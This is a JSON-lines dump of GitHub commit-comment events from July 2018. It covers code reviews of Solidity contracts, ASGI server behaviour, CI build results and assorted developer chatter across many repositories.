{"id":"7931637637","type":"CommitCommentEvent","actor":{"login":"IvanJB"},"repo":{"name":"IvanJB/Bootstrap-4.0"},"payload":{"comment":{"id":29628071,"position":null,"line":null,"path":null,"commit_id":"6bf409c50aaf5e76146aec270bd1638c1a796f13","created_at":"2018-07-07T02:48:54Z","updated_at":"2018-07-07T02:48:54Z","author_association":"OWNER","body":"Continuing Bootstrap with Brad Hussey and W3School"}},"created_at":"2018-07-07T02:48:54Z"}
{"id":"7931640660","type":"CommitCommentEvent","actor":{"login":"MichaelNeely77"},"repo":{"name":"MichaelNeely77/100-days-of-code"},"payload":{"comment":{"id":29628078,"position":1,"line":1,"path":"daily-log","commit_id":"c83903b1da218014ba440042f1ba789fc311f354","created_at":"2018-07-07T02:51:48Z","updated_at":"2018-07-07T02:51:48Z","author_association":"OWNER","body":"Today I discovered that there is actually a log on GitHub that I should have been using all along. Although I have been doing a lot of coding on client websites, I will not post that code publicly (because it isn't public information). I'll still be working to figure out this part of the challenge too.,"}},"created_at":"2018-07-07T02:51:48Z"}
{"id":"7931645442","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628085,"position":null,"line":null,"path":null,"commit_id":"aae388b45b15dd61bf1a1356c58b08321deee879","created_at":"2018-07-07T02:56:38Z","updated_at":"2018-07-07T02:56:38Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-07T02:56:38Z"}
{"id":"7931645730","type":"CommitCommentEvent","actor":{"login":"VinodAnandan"},"repo":{"name":"OWASP/sonarqube"},"payload":{"comment":{"id":29628086,"position":null,"line":null,"path":null,"commit_id":"d8670826b3ab839bb4a82ae283963ae81ad398e8","created_at":"2018-07-07T02:56:53Z","updated_at":"2018-07-07T02:56:53Z","author_association":"COLLABORATOR","body":"Hi @jaimeniswonger,\r\n\r\nApologies, It was never my intention to break your current integration. I will fix the non-root issue as soon as possible. I was forced to change the complete image as  SonarSource decided on a different strategy with the docker images. Before we were building the docker image from their docker image. Now we are building it from openjdk:8-alpine .\r\n\r\nYes, great suggestion. I was thinking about giving a proper version to OWASP SonarQube and pushing it with tags. Also to decide major version change strategies.  If you are interested to discuss and share your ideas, I can work with you for the versioning.\r\n\r\nThank you very much,\r\n\r\nVinod"}},"created_at":"2018-07-07T02:56:53Z"}
{"id":"7931646737","type":"CommitCommentEvent","actor":{"login":"0447950577"},"repo":{"name":"0447950577/chonchos"},"payload":{"comment":{"id":29628087,"position":null,"line":null,"path":null,"commit_id":"d223ea0e59fa3cf6e698334a20f5b3e34108c450","created_at":"2018-07-07T02:57:57Z","updated_at":"2018-07-07T02:57:57Z","author_association":"OWNER","body":"hello u no who i am and know that that splinter just turn back on after losing all functions so were are u please i just have to no before anyone els ummmmm a least tell me ur not to far at last i the mikly way at least\r\n"}},"created_at":"2018-07-07T02:57:57Z"}
{"id":"7931648544","type":"CommitCommentEvent","actor":{"login":"fungilation"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29628096,"position":null,"line":null,"path":null,"commit_id":"699e5eebe807d1ced660d2d2f39b5679d26925da","created_at":"2018-07-07T02:59:53Z","updated_at":"2018-07-07T02:59:53Z","author_association":"NONE","body":"If NDK is not installed with gradle plugin 2.3.3, it would litter warnings everywhere on `react-native run-android`.\r\n\r\nI'll rephrase with NDK install: installing in Android Studio is the most obvious installation path, and there's no way to specify NDK version to install there."}},"created_at":"2018-07-07T02:59:53Z"}
{"id":"7932854474","type":"CommitCommentEvent","actor":{"login":"Alexkho82"},"repo":{"name":"Alexkho82/Hello-world-"},"payload":{"comment":{"id":29630773,"position":null,"line":null,"path":null,"commit_id":"7c72f42f511e418efff62aa11a3ef8a4f2b7a738","created_at":"2018-07-07T20:00:55Z","updated_at":"2018-07-07T20:00:55Z","author_association":"OWNER","body":"7c72f42"}},"created_at":"2018-07-07T20:00:55Z"}
{"id":"7932855608","type":"CommitCommentEvent","actor":{"login":"kbhutani0001"},"repo":{"name":"IOStream-OpenEnd/snoc"},"payload":{"comment":{"id":29630777,"position":null,"line":null,"path":null,"commit_id":"bc477cba1b541fb17b77874f2cb102b7595ea7a6","created_at":"2018-07-07T20:01:46Z","updated_at":"2018-07-07T20:01:46Z","author_association":"NONE","body":"SNOC - Social Network of College (Any changes regarding name and logo are also appreciated :p )\r\n\r\nSNOC is an open source project which targets some problems faced by college students. Anyone willing to contribute can mail his resume at kbhutani0001@gmail.com Technology used - Python, Flask, Mongodb, Javascript\r\n\r\nProblems:\r\n\r\nStudents don't get notified about workshops and events going around in their college.\r\nMaterial and information sharing is limited to whatsapp groups only.\r\nSNOC is targetting such problem and some related problems in the future too.\r\n\r\nWorking: User can log in and see upcoming events and workshop in a Calendar. Feed has all the posts and details which society right now posts on facebook and other networks. Society channels which they can join and share the material and stuff. Later we are thinking of allowing user to link their handles of coding platforms like codechef, hackerrank etc. So that they only have to share link of this profile in resume, hence making it easy for recruiters and friends to check their stats."}},"created_at":"2018-07-07T20:01:46Z"}
{"id":"7932856667","type":"CommitCommentEvent","actor":{"login":"rabits"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29630780,"position":7,"line":305,"path":"lib/distributions.sh","commit_id":"92258e0298c629059c13f4abc8f762a00a40afd2","created_at":"2018-07-07T20:02:34Z","updated_at":"2018-07-07T20:02:34Z","author_association":"CONTRIBUTOR","body":"Thank you!"}},"created_at":"2018-07-07T20:02:34Z"}
{"id":"7932859232","type":"CommitCommentEvent","actor":{"login":"tomchristie"},"repo":{"name":"encode/uvicorn"},"payload":{"comment":{"id":29630786,"position":300,"line":300,"path":"uvicorn/protocols/http/h11.py","commit_id":"07c6c18945ab4f4167118e717e197adce3aee3da","created_at":"2018-07-07T20:04:43Z","updated_at":"2018-07-07T20:04:43Z","author_association":"MEMBER","body":"Not immediately obvious to me how allowing a disconnect message after more_body: False makes any difference there, given that you won’t be receiving messages in that case (just sending them). Tho it does raise an interesting point on how send should handle closed connections. (Kinda different depending on long-polling vs req/resp context.)"}},"created_at":"2018-07-07T20:04:43Z"}
{"id":"7932859828","type":"CommitCommentEvent","actor":{"login":"elina-codes"},"repo":{"name":"elina-codes/hiring-without-whiteboards"},"payload":{"comment":{"id":29630788,"position":null,"line":null,"path":null,"commit_id":"76e981bc74429c551a44d7623bbeba714971395e","created_at":"2018-07-07T20:05:11Z","updated_at":"2018-07-07T20:05:11Z","author_association":"OWNER","body":"## Add/Update/Remove <CompanyName>\r\n\r\n- [x ] I have read the [contributing guidelines](https://github.com/poteto/hiring-without-whiteboards/blob/master/CONTRIBUTING.md)\r\n- [x ] I agree to the [Code of Conduct](https://github.com/poteto/hiring-without-whiteboards/blob/master/CODE_OF_CONDUCT.md)\r\n- [x ] I have followed the [format](https://github.com/poteto/hiring-without-whiteboards/blob/master/CONTRIBUTING.md#format) prescribed in the contributing guidelines\r\n- [x ] (OPTIONAL) In your pull request message, add additional context on the interview process if necessary"}},"created_at":"2018-07-07T20:05:11Z"}
{"id":"7932860283","type":"CommitCommentEvent","actor":{"login":"SankHere"},"repo":{"name":"RafalMakac/RafalMakac"},"payload":{"comment":{"id":29630789,"position":2,"line":2,"path":".gitattributes","commit_id":"bf2aff5319c8776c2fa97ab550203957b3e3dc9b","created_at":"2018-07-07T20:05:33Z","updated_at":"2018-07-07T20:05:33Z","author_association":"NONE","body":"Text auto? Chyba w stackoverflow byłeś i to widziałeś"}},"created_at":"2018-07-07T20:05:33Z"}
{"id":"7932862613","type":"CommitCommentEvent","actor":{"login":"RafalMakac"},"repo":{"name":"RafalMakac/RafalMakac"},"payload":{"comment":{"id":29630798,"position":2,"line":2,"path":".gitattributes","commit_id":"bf2aff5319c8776c2fa97ab550203957b3e3dc9b","created_at":"2018-07-07T20:07:23Z","updated_at":"2018-07-07T20:07:23Z","author_association":"OWNER","body":"Stop stalking "}},"created_at":"2018-07-07T20:07:23Z"}
{"id":"7932862762","type":"CommitCommentEvent","actor":{"login":"tdhock"},"repo":{"name":"tdhock/animint2"},"payload":{"comment":{"id":29630799,"position":15,"line":1491,"path":"inst/htmljs/animint.js","commit_id":"c4033607f8aade5cef3ceb0c41d3571d0935eee4","created_at":"2018-07-07T20:07:29Z","updated_at":"2018-07-07T20:07:29Z","author_association":"OWNER","body":"@adrianblanco I don't think this code will work -- polygons are handled in another part of the code -- search for the comment which starts \"Lines, paths, polygons, and ribbons are a bit special\""}},"created_at":"2018-07-07T20:07:29Z"}
{"id":"7932866581","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29630806,"position":null,"line":null,"path":null,"commit_id":"75c2d244668d5f7625e2dec35cb0f557510b5c28","created_at":"2018-07-07T20:10:39Z","updated_at":"2018-07-07T20:10:39Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T20:10:39Z"}
{"id":"7932870768","type":"CommitCommentEvent","actor":{"login":"Pinacolada64"},"repo":{"name":"Pinacolada64/ImageBBS"},"payload":{"comment":{"id":29630813,"position":null,"line":null,"path":null,"commit_id":"69ec3d3316d958b615fffb3c3c8f25c9a9424397","created_at":"2018-07-07T20:14:12Z","updated_at":"2018-07-07T20:14:12Z","author_association":"OWNER","body":"Sure thing. I'm also experimenting with some additional features in `+.CP` - see the `v2-copier` branch, if you'd like. Not ready for prime time, but might be interesting?"}},"created_at":"2018-07-07T20:14:12Z"}
{"id":"7932872106","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29630815,"position":3,"line":3,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-07T20:15:12Z","updated_at":"2018-07-07T20:15:12Z","author_association":"NONE","body":"You could make a `SafeMath.sol` and then `import \"./SafeMath.sol` here."}},"created_at":"2018-07-07T20:15:12Z"}
{"id":"7932874200","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29630822,"position":29,"line":83,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-07T20:16:46Z","updated_at":"2018-07-07T20:16:46Z","author_association":"NONE","body":"Checking \"distinct\" is a good idea. You should also check `!address(0)` because that would indicate they probably forgot and they're setting up to burn ETH if it continues. "}},"created_at":"2018-07-07T20:16:46Z"}
{"id":"7932878867","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29630826,"position":66,"line":105,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-07T20:20:43Z","updated_at":"2018-07-07T20:20:43Z","author_association":"NONE","body":"Treat these event emitters as state changes and put them ahead of `transfer`, `call` and `send` which are implicit transfers of flow control. You want those three methods that give targets a chance to try re-entrance to be last. Rule of thumb, it goes:\r\n\r\n1. Optimistic accounting - get the contract state in order\r\n2. Try call, send or transfer\r\n3. Check the result and if needed, revert state changes from step 1\r\n\r\nThe `transfer` method does the revert automatically and it was implemented because too many developers overlooked the need to something like `if(!address.send(amount)) revert()`. \r\n"}},"created_at":"2018-07-07T20:20:43Z"}
{"id":"7932879035","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29630827,"position":4,"line":4,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T20:20:48Z","updated_at":"2018-07-07T20:20:48Z","author_association":"OWNER","body":"разобрался)\r\n"}},"created_at":"2018-07-07T20:20:48Z"}
{"id":"7932879124","type":"CommitCommentEvent","actor":{"login":"pgjones"},"repo":{"name":"encode/uvicorn"},"payload":{"comment":{"id":29630828,"position":300,"line":300,"path":"uvicorn/protocols/http/h11.py","commit_id":"07c6c18945ab4f4167118e717e197adce3aee3da","created_at":"2018-07-07T20:20:53Z","updated_at":"2018-07-07T20:20:53Z","author_association":"CONTRIBUTOR","body":"I thought we'd agreed on the following for how send should handle closed connections, (from the ASGI spec)\r\n\r\n> Note messages received by a server after the connection has been closed are not considered errors. In this case the send awaitable callable should act as a no-op.\r\n\r\nI think an application could always be able to receive messages, as even if it is just sending it still has the `application_instance` in scope. For example in [Quart](https://gitlab.com/pgjones/quart/blob/master/quart/asgi.py#L44) the sending is spawned to a separate task that can be cancelled in the `application_instance` if a disconnect is received."}},"created_at":"2018-07-07T20:20:53Z"}
{"id":"7932879393","type":"CommitCommentEvent","actor":{"login":"dave11111"},"repo":{"name":"dave11111/CurrentActivityPlugin"},"payload":{"comment":{"id":29630829,"position":19,"line":37,"path":"src/Plugin.CurrentActivity.Android/CurrentActivityImplementation.cs","commit_id":"3af7c0ce45b7d201ce57a7e5396a80cb3bf10356","created_at":"2018-07-07T20:21:09Z","updated_at":"2018-07-07T20:21:09Z","author_association":"OWNER","body":"OnActivityStopped(Activity "}},"created_at":"2018-07-07T20:21:09Z"}
{"id":"7932879854","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29630832,"position":null,"line":null,"path":null,"commit_id":"f420f9b85b5f5612f58a45ab49e8aba54f6f5527","created_at":"2018-07-07T20:21:35Z","updated_at":"2018-07-07T20:21:35Z","author_association":"MEMBER","body":"@mksully22 Could you please look at this error?"}},"created_at":"2018-07-07T20:21:35Z"}
{"id":"7932880876","type":"CommitCommentEvent","actor":{"login":"tomchristie"},"repo":{"name":"encode/uvicorn"},"payload":{"comment":{"id":29630834,"position":300,"line":300,"path":"uvicorn/protocols/http/h11.py","commit_id":"07c6c18945ab4f4167118e717e197adce3aee3da","created_at":"2018-07-07T20:22:28Z","updated_at":"2018-07-07T20:22:28Z","author_association":"MEMBER","body":"Understood, yup. receive on a different task, and set a flag or issue a cancellation from there."}},"created_at":"2018-07-07T20:22:28Z"}
{"id":"7932889080","type":"CommitCommentEvent","actor":{"login":"falexwolf"},"repo":{"name":"Koncopd/anndata"},"payload":{"comment":{"id":29630858,"position":null,"line":null,"path":null,"commit_id":"20e363ac71da6747a5dd77ce624fdb27cc8cc9fd","created_at":"2018-07-07T20:29:51Z","updated_at":"2018-07-07T20:29:51Z","author_association":"NONE","body":"Hey @Koncopd! Perfect! Awesome! Sorry for having been a bit impatient before... Just a bit strange why there now performance issues with this solution arise. Hm, I thought we did all the thorough benchmarking before. Let's discuss!"}},"created_at":"2018-07-07T20:29:51Z"}
{"id":"7932891300","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29630867,"position":6,"line":6,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-07T20:31:50Z","updated_at":"2018-07-07T20:31:50Z","author_association":"NONE","body":"By convention, put your state variables first, then events and modifiers (don't sweat it if those terms are unfamiliar), then the constructor, then the other functions. "}},"created_at":"2018-07-07T20:31:50Z"}
{"id":"7932892801","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29630869,"position":9,"line":9,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-07T20:33:11Z","updated_at":"2018-07-07T20:33:11Z","author_association":"NONE","body":"Wouldn't it be more clear to call this `balances` e.g. you have balances for each address?"}},"created_at":"2018-07-07T20:33:11Z"}
{"id":"7932892848","type":"CommitCommentEvent","actor":{"login":"pradeepgangwar"},"repo":{"name":"mishuvs/open-event-frontend"},"payload":{"comment":{"id":29630870,"position":14,"line":18,"path":"app/components/modals/add-user-role-modal.js","commit_id":"6178614bce7471c6fbc8ccd5d814c5b8de365a85","created_at":"2018-07-07T20:33:14Z","updated_at":"2018-07-07T20:33:14Z","author_association":"NONE","body":"just add a new action here. \r\n```\r\n\r\n    close() {\r\n      if (!this.get('currentInvite').get('id')) {\r\n        this.get('currentInvite').unloadRecord();\r\n      }\r\n      this.set('isOpen', false);\r\n    }\r\n```\r\nNothing else is required."}},"created_at":"2018-07-07T20:33:14Z"}
{"id":"7932895017","type":"CommitCommentEvent","actor":{"login":"cwoolum"},"repo":{"name":"ionic-team/v4-migration-tslint"},"payload":{"comment":{"id":29630872,"position":null,"line":null,"path":null,"commit_id":"be4f9171d0f6814dd0a1e80ae77cfc7c4559749f","created_at":"2018-07-07T20:35:23Z","updated_at":"2018-07-07T20:35:23Z","author_association":"COLLABORATOR","body":"Do you mean you just return the promise for present and let the upstream caller await? \r\n\r\n```\r\nreturn overlay.present();\r\n```"}},"created_at":"2018-07-07T20:35:23Z"}
{"id":"7932896739","type":"CommitCommentEvent","actor":{"login":"falexwolf"},"repo":{"name":"Koncopd/anndata"},"payload":{"comment":{"id":29630875,"position":null,"line":null,"path":null,"commit_id":"c7d1acc0b964cd4908921b9b35c0748694f99447","created_at":"2018-07-07T20:37:02Z","updated_at":"2018-07-07T20:37:02Z","author_association":"NONE","body":"Good that you started this. I don't get why you want to pass an `atype` to this? I thought that layers would really just concern replicates of `X`. Of course, it would be cooler to have a whole better version of the AnnDataFileManager that already exists, which manages the backing of `obsm`, `varm`, `layers`, `raw`, `X` and other stuff that we might find useful in the future. But I wouldn't put this into `layers`. For me, `layers` would really just be a shallow accessor to named replicates of `X`."}},"created_at":"2018-07-07T20:37:02Z"}
{"id":"7932896821","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29630876,"position":24,"line":24,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-07T20:37:06Z","updated_at":"2018-07-07T20:37:06Z","author_association":"NONE","body":"On second thought, google up \"events\". This function is about right. It is not a requirement, but it is a good default setting for your style to emit an event for every important state change. Here, some important things happened that changed the state. The recommendation would be to emit an event that includes the inputs so the step-by-step updates are easily auditable, the balances at any point in time could be (theoretically) constructed by an observer and so UI and server software clients have a way to stay up-to-date with the contract state. "}},"created_at":"2018-07-07T20:37:06Z"}
{"id":"7932898244","type":"CommitCommentEvent","actor":{"login":"mkhanstk"},"repo":{"name":"AlgorithMan-de/wyoos"},"payload":{"comment":{"id":29630880,"position":null,"line":null,"path":null,"commit_id":"01557ac3b68bc7f9e39e76d4b4bf2fdbe627ce3d","created_at":"2018-07-07T20:38:25Z","updated_at":"2018-07-07T20:38:25Z","author_association":"NONE","body":"Hi, the Video 5 has no audio. please reload it with audio. \r\nhttps://www.youtube.com/watch?v=AgeX-U4dKSs\r\nthanks. "}},"created_at":"2018-07-07T20:38:25Z"}
{"id":"7932898384","type":"CommitCommentEvent","actor":{"login":"alex4cable"},"repo":{"name":"alex4cable/hello-world-sandbox"},"payload":{"comment":{"id":29630881,"position":null,"line":null,"path":null,"commit_id":"d4bc447da01ecc0a5759b969b07568165543bdb4","created_at":"2018-07-07T20:38:33Z","updated_at":"2018-07-07T20:38:33Z","author_association":"OWNER","body":"Nice."}},"created_at":"2018-07-07T20:38:33Z"}
{"id":"7932898764","type":"CommitCommentEvent","actor":{"login":"runor-thoughtstudio"},"repo":{"name":"kampkelly/stin"},"payload":{"comment":{"id":29630882,"position":null,"line":null,"path":null,"commit_id":"ef0635f1f3b2dbbd55fe44219b1a7e1ec0d2d18f","created_at":"2018-07-07T20:38:56Z","updated_at":"2018-07-07T20:38:56Z","author_association":"CONTRIBUTOR","body":"good too"}},"created_at":"2018-07-07T20:38:56Z"}
{"id":"7932899186","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29630883,"position":47,"line":47,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-07T20:39:22Z","updated_at":"2018-07-07T20:39:22Z","author_association":"NONE","body":"Challenge time. `selfdestruct` is a horrible solution most of the time because it creates dangerous holes that just swallow any funds sent with no way to retrieve. Instead of destroying the contract, can you think of a way to add an emergency stop and even an emergency withdrawal?"}},"created_at":"2018-07-07T20:39:22Z"}
{"id":"7932900735","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29630890,"position":48,"line":48,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-07T20:40:47Z","updated_at":"2018-07-07T20:40:47Z","author_association":"NONE","body":"Have you considered\r\n```\r\nmodifier onlyOwner {\r\n  require(msg.sender == owner);\r\n  _;\r\n}\r\n```\r\n\r\nWith the modifier defined you then add it to functions like:\r\n```\r\nfunction mySuperUserFunction() onlyOwner { ...\r\n```\r\n"}},"created_at":"2018-07-07T20:40:47Z"}
{"id":"7932905521","type":"CommitCommentEvent","actor":{"login":"Jofairden"},"repo":{"name":"Jofairden/EvenMoreModifiers"},"payload":{"comment":{"id":29630899,"position":56,"line":79,"path":"Core/Cubes/CubeUIExtensions.cs","commit_id":"9fd485a61ee903562c872aba6ed6110fc4d8942a","created_at":"2018-07-07T20:44:57Z","updated_at":"2018-07-07T20:44:57Z","author_association":"OWNER","body":"This actually is probably not needed. Oh well"}},"created_at":"2018-07-07T20:44:57Z"}
{"id":"7932910712","type":"CommitCommentEvent","actor":{"login":"dany93"},"repo":{"name":"JSBSim-Team/jsbsim"},"payload":{"comment":{"id":29630910,"position":null,"line":null,"path":null,"commit_id":"a2aacadec2508cc5744c166255c28ae440d076a9","created_at":"2018-07-07T20:49:45Z","updated_at":"2018-07-07T20:49:45Z","author_association":"NONE","body":"Wouldn't the reference be issue https://github.com/JSBSim-Team/jsbsim/issues/88? (in the title)"}},"created_at":"2018-07-07T20:49:45Z"}
{"id":"7932916564","type":"CommitCommentEvent","actor":{"login":"cosmos72"},"repo":{"name":"glycerine/gomacro"},"payload":{"comment":{"id":29630921,"position":null,"line":null,"path":null,"commit_id":"cb89a36e6bce9b61720a074ba5eff476a34745a1","created_at":"2018-07-07T20:55:39Z","updated_at":"2018-07-07T20:55:39Z","author_association":"NONE","body":"nice idea :)\r\n\r\nIt's more useful to implement it in the fast interpreter though."}},"created_at":"2018-07-07T20:55:39Z"}
{"id":"7932918420","type":"CommitCommentEvent","actor":{"login":"diizzyy"},"repo":{"name":"lede-project/source"},"payload":{"comment":{"id":29630937,"position":null,"line":null,"path":null,"commit_id":"328ddcf628119733c511ec6cda06f2f0cc8d19ae","created_at":"2018-07-07T20:57:21Z","updated_at":"2018-07-07T20:57:21Z","author_association":"CONTRIBUTOR","body":"Please refer to what you're actually backporting.\r\n\r\nhttp://repo.or.cz/nasm.git/commitdiff/5eb1838b4d3752fd863d19442943983a2a5ee87c\r\nhttp://repo.or.cz/nasm.git/commitdiff/9f45a77f46829e666b35530939b9237cf978d4dc"}},"created_at":"2018-07-07T20:57:21Z"}
{"id":"7932922294","type":"CommitCommentEvent","actor":{"login":"evertonfraga"},"repo":{"name":"ethereum/ethereum-org"},"payload":{"comment":{"id":29630949,"position":15,"line":13,"path":".travis.yml","commit_id":"f3e814be7ae43d6a6aca66bba7937eae20a256c6","created_at":"2018-07-07T21:00:42Z","updated_at":"2018-07-07T21:00:42Z","author_association":"MEMBER","body":"hi, did you check that locally? Can you confirm your webserver has started at localhost:8080?"}},"created_at":"2018-07-07T21:00:42Z"}
{"id":"7932922775","type":"CommitCommentEvent","actor":{"login":"diizzyy"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29630950,"position":null,"line":null,"path":null,"commit_id":"328ddcf628119733c511ec6cda06f2f0cc8d19ae","created_at":"2018-07-07T21:01:06Z","updated_at":"2018-07-07T21:01:06Z","author_association":"CONTRIBUTOR","body":"Please refer to what you're actually backporting.\r\n\r\nhttp://repo.or.cz/nasm.git/commitdiff/5eb1838b4d3752fd863d19442943983a2a5ee87c\r\nhttp://repo.or.cz/nasm.git/commitdiff/9f45a77f46829e666b35530939b9237cf978d4dc"}},"created_at":"2018-07-07T21:01:06Z"}
{"id":"7932924119","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29630953,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-07T21:02:12Z","updated_at":"2018-07-07T21:02:12Z","author_association":"NONE","body":"@Alhadis : I have a copy of a complicated book done with EROFF, using (obviously modified) -mm macros on a 286 DOS PC, that puts most current books to shame on everything but \"pretty.\"  It was mastered on a Linotron using the standard PostScript fonts, and, different from most books done with troff, it's razor sharp.  The author was clearly proficient: I haven't found any troff coding errors, but there are some widow lines.  (Compiler Design in C, Alan Holub, Prentice-Hall, 1990, 924 pages.  You can get a PDF copy from the author's web site.)\n\n@n-t-roff : We may be thinking about two different things.  The \"typo-tests\" code is pretty much finished; it just needs to have the n-t-roff changes (the ones made after the fork) folded into it.  It can go into a separate directory if you like, but it was written to be able to replace the current code without changing anything related to existing documents unless a document specifically requests the new features.\n\nThe other topic I have in mind is a longer-term set of changes that can be generally described as an attempt to bring troff up to its potential.  It became clear working on the paragraphing that the harder I pushed the troff code the better the results got; the same seems to be true for macros.  So what I want to do is push both of them until they run into their limitations.  Preprocessors also need updating, along with corresponding changes to dpost.  Because the code will be in various stages of broken or nonfunctional for a long time, I don't think it would be a good idea to mix it in any way with production code until there is something users can relate to."}},"created_at":"2018-07-07T21:02:12Z"}
{"id":"7932924188","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29630954,"position":null,"line":null,"path":null,"commit_id":"70dfef79afc0f9482fd32dfd8e695c277cc60607","created_at":"2018-07-07T21:02:15Z","updated_at":"2018-07-07T21:02:15Z","author_association":"NONE","body":".gitkeep is not needed for non-empty directories"}},"created_at":"2018-07-07T21:02:15Z"}
{"id":"7932927962","type":"CommitCommentEvent","actor":{"login":"generic-github-user"},"repo":{"name":"generic-github-user/worst-syntax-ever"},"payload":{"comment":{"id":29630962,"position":3,"line":3,"path":"parser.js","commit_id":"4be27394430dedcbd0b664c2df186c6f7ee36444","created_at":"2018-07-07T21:05:38Z","updated_at":"2018-07-07T21:05:38Z","author_association":"OWNER","body":"From https://stackoverflow.com/a/6234804"}},"created_at":"2018-07-07T21:05:38Z"}
{"id":"7932928192","type":"CommitCommentEvent","actor":{"login":"ferninator"},"repo":{"name":"ferninator/https-fegrushsummer2018.edublogs.org-p-3-preview-true"},"payload":{"comment":{"id":29630963,"position":null,"line":null,"path":null,"commit_id":"f967be57aa6c13a33fd04daa14d5501963dfd261","created_at":"2018-07-07T21:05:53Z","updated_at":"2018-07-07T21:05:53Z","author_association":"OWNER","body":"Parent University first step!"}},"created_at":"2018-07-07T21:05:53Z"}
{"id":"7932928358","type":"CommitCommentEvent","actor":{"login":"generic-github-user"},"repo":{"name":"generic-github-user/worst-syntax-ever"},"payload":{"comment":{"id":29630964,"position":2,"line":2,"path":"parser.js","commit_id":"4be27394430dedcbd0b664c2df186c6f7ee36444","created_at":"2018-07-07T21:06:03Z","updated_at":"2018-07-07T21:06:03Z","author_association":"OWNER","body":"From https://stackoverflow.com/a/6234804"}},"created_at":"2018-07-07T21:06:03Z"}
{"id":"7932928569","type":"CommitCommentEvent","actor":{"login":"juniorjasin"},"repo":{"name":"juanborssotto/Summareasy"},"payload":{"comment":{"id":29630965,"position":9,"line":9,"path":"AUTHORS","commit_id":"e6a072fadbe964f860b55746974475470f7a31e0","created_at":"2018-07-07T21:06:15Z","updated_at":"2018-07-07T21:06:15Z","author_association":"COLLABORATOR","body":"quien es este salame?"}},"created_at":"2018-07-07T21:06:15Z"}
